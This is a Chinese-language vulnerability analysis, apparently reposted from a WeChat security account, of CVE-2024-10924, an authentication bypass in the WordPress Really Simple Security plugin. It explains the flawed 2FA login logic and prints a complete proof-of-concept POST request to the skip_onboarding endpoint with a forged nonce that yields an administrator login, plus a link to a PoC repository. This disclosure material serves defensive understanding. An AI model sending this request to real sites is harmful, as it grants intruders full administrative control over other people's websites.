400万网站受影响!WordPress Really Simple Security 插件漏洞分析

admin 2024年11月20日13:42:10评论25 views字数 1448阅读4分49秒阅读模式

近日,WordPress 插件Really Simple Security(原名 Really Simple SSL)被披露存在一个高危的认证绕过漏洞。该漏洞可能导致攻击者远程获得受影响网站的管理权限,危害极大。本篇文章将对漏洞细节、影响范围、修复情况及防护措施进行全面分析。400万网站受影响!WordPress Really Simple Security 插件漏洞分析

漏洞概述

CVE-2024-10924 是 Really Simple Security 插件的认证绕过漏洞,漏洞评分高达9.8(CVSS),属于严重级别。漏洞利用了插件的check_login_and_get_user 函数中的错误处理,允许攻击者在启用双因素认证(2FA)的情况下,冒充任意用户(包括管理员)登录受影响的网站。400万网站受影响!WordPress Really Simple Security 插件漏洞分析

此漏洞影响了插件9.0.0 至 9.1.1.1 版本,包括免费和付费版本,波及超过400万 WordPress 网站。Wordfence 安全研究员 István Márton 警告称,该漏洞非常容易被脚本化,从而引发针对 WordPress 网站的大规模自动化攻击。

漏洞细节分析

Really Simple Security 插件的核心功能是增强 WordPress 网站的安全性,包括启用 HTTPS、提供双因素认证等。然而,该漏洞的成因却来自插件对 2FA 认证逻辑的错误处理。

具体来说,漏洞位于check_login_and_get_user 函数,该函数负责验证用户的身份。然而,由于逻辑缺陷,攻击者可以通过构造恶意请求绕过身份验证。例如:

  • 函数中未正确处理认证失败的情况
    ,直接返回了管理员凭据;
  • 缺乏对认证数据完整性的验证
    ,导致攻击者可以伪造凭据。

这种设计缺陷使得攻击者可以直接冒充管理员登录,获得对网站的完全控制权限。

利用场景

插件的 REST API 暴露了skip_onboarding 接口,允许未经验证的用户提交登录请求。通过构造包含伪造参数的 POST 请求,攻击者可以利用该接口跳过 2FA 验证并获取登录状态。

PoC 请求示例
POST /wp-json/reallysimplessl/v1/two_fa/skip_onboarding HTTP/1.1 Host: kubernetes.docker.internal User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Content-Type: application/json; Connection: keep-alive Content-Length: 90 { "user_id":1, "login_nonce": "231231231", "redirect_to": "/wp-admin/" }
请求参数解析
  • user_id
    :目标用户的 ID(例如,管理员账户通常为1)。
  • login_nonce
    :伪造的登录令牌,插件未验证该值的真实性。
  • redirect_to
    :登录成功后的重定向目标地址,此处指向/wp-admin/ 管理后台。

poc:https://github.com/FoKiiin/CVE-2024-10924

原文始发于微信公众号(云梦安全):400万网站受影响!WordPress Really Simple Security 插件漏洞分析

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年11月20日13:42:10
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   400万网站受影响!WordPress Really Simple Security 插件漏洞分析http://cn-sec.com/archives/3413893.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息